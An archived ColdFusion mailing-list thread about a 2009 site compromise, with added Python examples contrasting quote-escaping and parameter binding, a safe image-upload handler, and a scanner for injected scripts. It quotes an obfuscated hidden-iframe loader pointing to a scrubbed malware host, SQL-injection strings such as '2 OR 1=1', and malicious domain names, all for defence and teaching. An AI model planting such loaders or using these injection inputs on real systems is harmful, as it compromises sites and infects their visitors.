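        [("a1", "alpha"), ("b2", "bravo"), ("c3", "charlie")],
    )
    return conn


def escape_quotes(value):
    # What cfquery does for you automatically: double every single quote in the value.
    return str(value).replace("'", "''")


def lookup_quoted_string(conn, uid):
    # Value sits inside single quotes and is quote-escaped, so the query text keeps
    # its structure: a hostile uid just becomes a string that matches nothing.
    sql = "SELECT secret FROM tbltable WHERE uid = '%s'" % escape_quotes(uid)
    return [row[0] for row in conn.execute(sql)]


def lookup_unquoted_number(conn, id_value):
    # Numeric value interpolated without quotes. Quote escaping is applied but is
    # useless here: there is no quote to break out of, the value simply *is* SQL.
    sql = "SELECT secret FROM tbltable WHERE id = %s" % escape_quotes(id_value)
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, id_value):
    # Bound parameter (what cfqueryparam / cfprocparam / sp_executesql do): the value
    # travels separately from the SQL text and can never change the statement's shape.
    return [row[0] for row in conn.execute(
        "SELECT secret FROM tbltable WHERE id = ?", (id_value,))]


def lookup_typed(conn, id_value):
    # Typed binding, like cfqueryparam cfsqltype="cf_sql_integer": reject input that
    # is not an integer before the database sees it, then bind the validated value.
    try:
        id_int = int(id_value)
    except (TypeError, ValueError):
        return None  # caller treats None as "bad request", not as "no rows"
    return lookup_bound(conn, id_int)


if __name__ == "__main__":
    conn = make_db()
    hostile = "2 OR 1=1"  # constructed hostile input: the textbook unquoted-number case
    print(lookup_quoted_string(conn, "a1"))             # ['alpha']
    print(lookup_quoted_string(conn, "a1' OR '1'='1"))  # []  (escaping held)
    print(lookup_unquoted_number(conn, "2"))            # ['bravo']
    print(lookup_unquoted_number(conn, hostile))        # ['alpha', 'bravo', 'charlie']  (every row)
    print(lookup_bound(conn, hostile))                  # []  (value compared as a literal)
    print(lookup_typed(conn, hostile))                  # None (rejected up front)
```

The middle function is the case Brad warns about: escaping did run, and it changed nothing, because the interpolated text was never inside a string literal to begin with. The last two functions are the two halves of what cfqueryparam gives you, binding and type validation; binding alone already stops the structural change, and the type check turns a hostile request into a clean error instead of an empty result set.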
Author: Chad Gray
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321508
One thing I will add is, if you are using CFFile to do the upload, use its
"accept" attribute to only accept the MIME types you want to upload. If it
errors, capture it and output a nice error message.
It is not foolproof, but another layer in making file upload safer.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321506
Technically, no.
In this post I have an example of a procedure which would be vulnerable to
all kinds of SQL injection attacks.
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
SQL injection is made possible when you don't differentiate between your SQL
code and arbitrary parameters. ANY form of dynamic SQL can be susceptible
to that.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321505
> Is it safe to assume then that using a stored procedure would have prevented
> the attack?
Yes, unless the stored procedure is using something like EXECUTE,
EXEC, etc to build executable strings of SQL.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321504
To be more precise, would the code below prevent an injection attack?
Stored proc:
.......
@uid uniqueidentifier
AS
BEGIN
SELECT ID, column1, column2..etc
FROM tbltable
WHERE UID = @uid
END
CF Code:
<cfquery name="doStuff" datasource="#application.DSN#">
EXEC usp_getSomeData
@uid = '#url.uid#'
</cfquery>
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321501
>This is yet another example where CFQUERYPARAM would have prevented
>the attack. Every time someone says it's unnecessary, I'm going to
>point them to this thread.
Is it safe to assume then that using a stored procedure would have prevented the
attack?
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321499
> What happened to us was not actually caused by ColdFusion. We found that it
> was a ColdFusion script we where running that was not secure.
Of course. CF is just like any other app server - it will do exactly
what you tell it to do. If you have CF programs that can write to the
filesystem, they need to be secured to prevent them from writing to
the filesystem in ways you don't want.
> The attacker used a method called sql injection attack, which means he/she
> queried the server hundreds if not thousands of times data mining the database until
> they got the site's admin/password.
You can easily prevent this by using CFQUERYPARAM in all database
queries for any data that comes from the client.
----- Excess quoted text cut - see Original Post for more -----
In general, you should be very careful when allowing file uploads. You
might rename files, you might place those files in a directory that
blocks execution, you might place those files in a non-web-accessible
directory.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321497
2009/4/10 ALL <thegreatall@gmail.com>:
> I cannot stress enough how important it is to escape sql strings before
> sending them to a SQL server of any kind,
This is yet another example where CFQUERYPARAM would have prevented
the attack. Every time someone says it's unnecessary, I'm going to
point them to this thread.
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321496
After a lot of looking into and investigating last night, we have found some
more info on the subject.
What happened to us was not actually caused by ColdFusion. We found that it
was a ColdFusion script we were running that was not secure. The attacker
used a method called SQL injection attack, which means he/she queried the
server hundreds if not thousands of times, data mining the database until
they got the site's admin/password.
So, there was 1 security issue with the ColdFusion script we were using.
After he got the admin/password they logged into the site's administration
and uploaded a "gif", but it was not actually a "gif"; rather, it was an ASP
page that got executed on the server, because whoever wrote our CMS
obviously didn't know how to code securely. (file name was logs.asp or
log.aspx or a combo of the two)
After he had an ASP page on the server, he used that script to upload another
ASP page named "tops.aspx" which, when I reviewed the code and did some
research into it, I found was actually a well known trojan that
was specifically designed to give "attackers" access to infected servers.
Hope this comes of use to some other people having this issue; I cannot
stress enough how important it is to escape SQL strings before sending them
to a SQL server of any kind, and how important it is to rename files that
people upload when writing a script. (The most secure way is generally to do
two things: first, you can verify images by using code to make sure the file
is actually an image [I'm sure you can find some free code to do so], and
rename the image so it does not put an extension on the file, or make sure
the file ends in .jpg, .gif, etc... and make sure you do not allow script
execution in the folder you upload to.)
Hope this helps,
-Nathan
----- Excess quoted text cut - see Original Post for more -----
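Chad's "accept" attribute, Dave's advice further down (rename uploads, keep them out of web-accessible or executable directories) and Nathan's closing advice here (verify the file really is an image, rename it, never trust the client's extension) together describe a single upload handler. The following is an added illustration in Python, not code from the thread or from any CMS it mentions: `check_mime` plays the part of cffile's accept check on the client-declared MIME type (and shows why that alone is not foolproof), `sniff_image_type` decides from the bytes, and `store_upload` writes the file under a server-chosen random name into a directory the server picks. The two sample uploads in `demo` are constructed.

```python
import os
import secrets
import shutil
import tempfile

ALLOWED_MIME = {"image/gif", "image/jpeg", "image/png"}

# Leading bytes of the image formats we accept, mapped to the extension *we* assign.
MAGIC = {
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
}


def check_mime(content_type):
    # Equivalent of cffile accept="image/gif,image/jpeg,image/png". The browser derives
    # this header from the file name it was handed, so it is a first filter only: an
    # ASP page renamed "logo.gif" arrives labelled image/gif.
    return content_type.split(";")[0].strip().lower() in ALLOWED_MIME


def sniff_image_type(data):
    # Decide the type from the file's own bytes, ignoring its name and declared type.
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def store_upload(data, content_type, upload_dir):
    """Return the stored path, or None if the upload is refused.

    upload_dir should be outside the web root (or a directory where the web server
    has script execution disabled); the stored file name never comes from the client.
    """
    if not check_mime(content_type):
        return None
    ext = sniff_image_type(data)
    if ext is None:
        return None
    name = secrets.token_hex(16) + ext  # random name, extension chosen from the bytes
    path = os.path.join(upload_dir, name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo():
    """Run the handler on two constructed uploads; returns (stored_ext, refused)."""
    real_gif = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00" * 16     # constructed GIF header
    asp_as_gif = b"<% 'constructed placeholder, not an image' %>"  # script posing as a .gif
    upload_dir = tempfile.mkdtemp()
    try:
        stored = store_upload(real_gif, "image/gif", upload_dir)
        refused = store_upload(asp_as_gif, "image/gif", upload_dir)  # MIME lies, bytes do not
        stored_ext = os.path.splitext(stored)[1] if stored else None
        return stored_ext, refused
    finally:
        shutil.rmtree(upload_dir)


if __name__ == "__main__":
    print(demo())  # ('.gif', None)
```

The second upload in `demo` is the thread's own incident in miniature: the declared type passes, the bytes do not, and nothing is written. Even when both checks pass, the random name and server-chosen extension mean an attacker who somehow got a script past them still cannot predict its URL, and a directory with execution disabled means it would not run if they could.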
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321495
Nathan,
Can you answer a question for me. Does this attack affect "all cfm" pages or
does it affect "index.*" pages?
-Mark
Mark A. Kruger, CFG, MCSE
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321494
Nathan,
Thank you for contributing to this thread. It reminds me to add a bit of
our research on this issue as well. A couple of posts which seem very on
point are here:
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://www.abuse.ch/?p=737
We don't think that this is limited to CF, but there may be a number of
variation in play.
Thanks again,
Nick
Author: Nathan Bruer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321493
Ok, I wanted to post here, because I have been looking around on Google the last
few days because we had the same issue, to give an update on all the findings
we have found from our investigation...
First off, this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.
Whatever has been writing the script seems to be embedded in either one of the
ColdFusion files somewhere or in the database you are executing from; we have not
figured it out yet.
This is what we have decided to do to solve the issue...
Step 1: Shut down IIS. Whatever is causing this requires IIS to run, from what we
have seen.
Step 2: I have written a simple script in PHP (because that is what I script in)
that will go through every file in the specified path and remove anything that it
finds matching the pattern in the 2.txt file (the default is what was being written
to our server). It will log all the files it changed to the alog.log file in the same
directory. Here is what you need to do to run the script...
1. Download: http://www.rallyinfo.com/fixer.zip
2. Extract it somewhere on the server.
3. Install PHP (if you don't already have it; REQ PHP5+ [I believe]).
4. Open the 1.php file in the folder you extracted it to, and edit the line
that says "Path = 'D:/'" to whatever path you want to check (I'd suggest running
it multiple times, on every drive).
5. Open a command line and go to the folder that you extracted it to. (For example,
in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TO", then, if it is on a
different drive, type the drive letter followed by a ":".)
6. Type "php 1.php". Now wait; it may take hours depending on how many files
it has to read.
This script will ONLY remove the infected files; it will NOT fix the issue. We
have not figured out what is causing the issue. I have a feeling, since we are
using an Access database to hold the info for ColdFusion, that there is somewhere in
the database it is executing from; however, we have no proof yet. Another theory
is that it somehow implanted itself into one of the CF files on whatever site had
it infected first, and every time someone goes to that site it re-runs the script
to infect other files with it.
Step 3: Either uninstall ColdFusion or turn it off so it will no longer be run in
IIS. We decided to uninstall ColdFusion because we only have about 2 sites that
still use it, and we have decided to convert them to PHP.
After that I cannot help much, seeing as how we didn't actually find the issue, but
rather made it unable to run any longer.
If you have any questions or comments I will actively watch this thread, and I
will assist in (only through this thread) removing corrupted files.
-Nathan Bruer
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321442
> > In that case, you can no longer trust the host, or its
> > host (if it's virtualised). In the latter case, all other
> > guests on the same box are also suspect.
> I've not heard of a remote exploit that can climb out of a VM.
It's trivial to do (look at Invisible Labs red pill / blue pill work for how
it works on 'bare metal' hypervisors, and there was an exploit against VMWare
the other year).
If I was targeting ecommerce sites, I'd want to tick that box in my malware's
toolkit.
--
Helping to completely enable impactful end-to-end data as part of the IT team
of the year, '09 and '08
Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099
Tom.Chiverton@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office together with a list of those
non members who are referred to as partners. We use the word partner to refer
to a member of the LLP, or an employee or consultant with equivalent standing and
qualifications. Regulated by the Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit www.Halliwells.com.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321379
> In that case, you can no longer trust the host, or its
> host (if it's virtualised). In the latter case, all other
> guests on the same box are also suspect.
I've not heard of a remote exploit that can climb out of a VM.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321378
> So, I guess one question is whether an XSS type
> hack can result in code being added to a file on the
> web server.
No, not by itself. The WebDAV that Mosh mentioned, that's a likely culprit.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321377
----- Excess quoted text cut - see Original Post for more -----
My first thought is, if this script has actually been written to your
.cfm files, this is a successful hack, not a hack attempt.
My second thought is, why are these files writeable in the first
place? In the vast majority of CF apps, neither the CF user account
nor the IIS user account needs write permission to your CF files.
Finally, I'm not aware of any specific worm that does this exact
thing. Nor am I aware of any IIS issue that would allow this. My guess
is that you have some CF application that allows writes to the
filesystem; perhaps one of the CF sample apps?
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Mosh Teitelbaum
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321376
Nick:
In addition to FTP, etc., check to see if you have WebDAV enabled on your
server. It's an extension of HTTP that allows people to remotely author
files on a website. A couple of years back, a client of mine had their site
modified with WebDAV and, upon further review, every site on that server
that had an index.cfm file had had that file modified to include the
malicious code.
HTH
--
Mosh Teitelbaum
evoch, LLC
Tel: (301) 942-5378
Fax: (301) 933-3651
Email: mosh.teitelbaum@evoch.com
WWW: http://www.evoch.com/
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321374
And if your CFML templates have been changed, it is possible that malware has
been installed on the server itself (via cfexecute).
In that case, you can no longer trust the host, or its host (if it's
virtualised). In the latter case, all other guests on the same box are also
suspect.
Tom Chiverton
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321373
Nick, it is *POSSIBLE* for your actual index.cfm files to be modified
via SQL injection (xp_cmdshell on MS SQL Server), but it is highly
doubtful.
I can't think of a scenario where XSS could actually affect files on
your server since that is a client-based attack. The XSS attack would
need to be coupled with a server-side vulnerability.
I would focus directly on all of your FTP access, Windows file sharing
access, and telnet/remote desktop connections. If you are using shared
hosting, your problem just got a lot harder to track down.
Also, for the record-- it is possible for an attacker to modify cfm
files on your server if you have a piece of your application that allows
users to upload files to the server (like images or attachments) and
these files are placed in a web accessible location where they could be
accessed via a URL and executed. (imagine uploading a .cfm file with a
few cffile tags in it...)
The probability of this sort of attack is smaller than the chances of
someone brute-forcing your FTP login though.
Like I said before, change ALL your passwords, and check your logs. If
this is a publicly accessible server, it should be behind a firewall
blocking ALL ports not absolutely necessary (like 80 and 443).
~Brad
Author: Bosky, Dave
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321369
It's an iframe injection hack. It will insert a hidden frame into any
index.* page it finds.
Some URL entries inserted are 'goooogleleadsense.biz/?click=*****',
'mediahousenameshopfilm.cn/in.cgi?income29'
Change FTP passwords...
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321366
William,
That's a great post - we're re-reading it now. However, this situation
seems to be code in the index.cfm page, not something being appended from
the db. So, I'm not sure if that post will be relevant in this case.
Thoughts?
N
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321365
Brad,
Many thanks for your response. We'll take a look at those things.
It appears that the code is in the actual index.cfm pages on the web server.
There are some old sites on this server that may be vulnerable, so that is a
theory. However, I would expect that kind of vulnerability to result in a
database injection, which is not what we are seeing. So, I guess one
question is whether an XSS type hack can result in code being added to a
file on the web server.
Thoughts?
N
----- Excess quoted text cut - see Original Post for more -----
Author: William
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321362
Do a search on this list for 'exec('.
There was a big to-do about this last summer. Probably in your database.
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321361
Is the malicious string in the actual index.cfm page on the server, or
is it being output on the page when CF processes it as part of a
variable from the form/url or database?
If the actual files on your web server have been modified, change all
your FTP and remote admin passwords immediately and run an antivirus
scan.
Also, check your FTP logs, and the date/time modified on the files to
determine when and how they were modified. Run an extended find and
replace to clean your .cfm files.
If the string is being appended into a url or form field and then output
on the page, htmleditformat or jsstringformat all user-entered data and
read up on XSS attacks.
If the string has been appended into your database variables and is
being output on the page that way, look for unparameterized SQL
statements, run a queryparam scanner, change your SQL Server login
passwords, and read up on SQL injection attacks. Update your database
to remove the malicious values.
~Brad
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321353
Hi there. We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.
The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:
<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
The script downloads malware, which we obviously want to prevent. We're
trying to determine how it's getting in there, whether through an old site
with inadequate code or the OS or something else. Any thoughts?
This is on a server running IIS 6 / CF7.
Thanks in advance,
Nick
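The block Nick quotes keeps its payload in string fragments that are only glued together by document.write, so a plain text search for "<iframe" across the web root finds nothing. Brad's reply suggests checking modification times, and Nathan's PHP fixer walks every file for a known pattern; the following is an added Python scanner in that spirit, not the thread's script. It reassembles each document.write call from the variables assigned before it, flags files whose assembled output injects a frame, and reports the path and mtime so the files can be reviewed and restored from a known-good copy rather than edited in place. `build_sample_tree` writes constructed sample files for the demo, one of them carrying the scrubbed script from Nick's post.

```python
import os
import re
import shutil
import tempfile
import time

# var name = "fragment";   (backslash escapes inside the string are allowed)
ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# document.write(a+b+c);   (only the variable-concatenation form is reassembled)
WRITE_RE = re.compile(r'document\.write\(\s*([\w\s+]+?)\s*\)')

SCRIPT_EXTS = (".cfm", ".cfml", ".htm", ".html", ".asp", ".aspx", ".php", ".js")


def reassemble_writes(source):
    """Return the strings document.write would emit when its argument is a
    concatenation of string variables assigned earlier in the file."""
    fragments = dict(ASSIGN_RE.findall(source))
    out = []
    for m in WRITE_RE.finditer(source):
        names = [n.strip() for n in m.group(1).split("+")]
        if names and all(n in fragments for n in names):
            out.append("".join(fragments[n] for n in names))
    return out


def is_suspicious(source):
    # Flag when the de-obfuscated output injects a frame, hidden or not.
    return any("<iframe" in s.lower() for s in reassemble_writes(source))


def scan_tree(root):
    """Walk root; return [(path, mtime)] for files carrying the injected script."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCRIPT_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if is_suspicious(src):
                mtime = time.strftime("%Y-%m-%d %H:%M:%S",
                                      time.localtime(os.path.getmtime(path)))
                hits.append((path, mtime))
    return hits


# The scrubbed script from the original post, used here as constructed sample input.
INJECTED = '''<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".[BAD URL HERE]";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>'''

# A benign page with an ordinary document.write call, to show the scanner ignores it.
CLEAN = '<cfoutput>Hello #session.user#</cfoutput>\n<script>document.write(new Date());</script>\n'


def build_sample_tree(root):
    """Constructed sample: site1 is clean, site2's index.cfm has the script appended."""
    for site, body in (("site1", CLEAN), ("site2", CLEAN + INJECTED + "\n")):
        os.makedirs(os.path.join(root, site))
        with open(os.path.join(root, site, "index.cfm"), "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Scan a constructed tree; return flagged paths relative to its root, with / separators."""
    root = tempfile.mkdtemp()
    try:
        build_sample_tree(root)
        return [os.path.relpath(p, root).replace(os.sep, "/") for p, _ in scan_tree(root)]
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())  # ['site2/index.cfm']
```

Reassembling the fragments is what makes this more than a grep: the same approach catches any variant that reorders or renames the variables, as long as the final string still opens an iframe. The mtime column is the lead for the timeline Brad describes, since every flagged file written in the same few minutes points at one write path (FTP, WebDAV, an upload form) to go and look for in the logs.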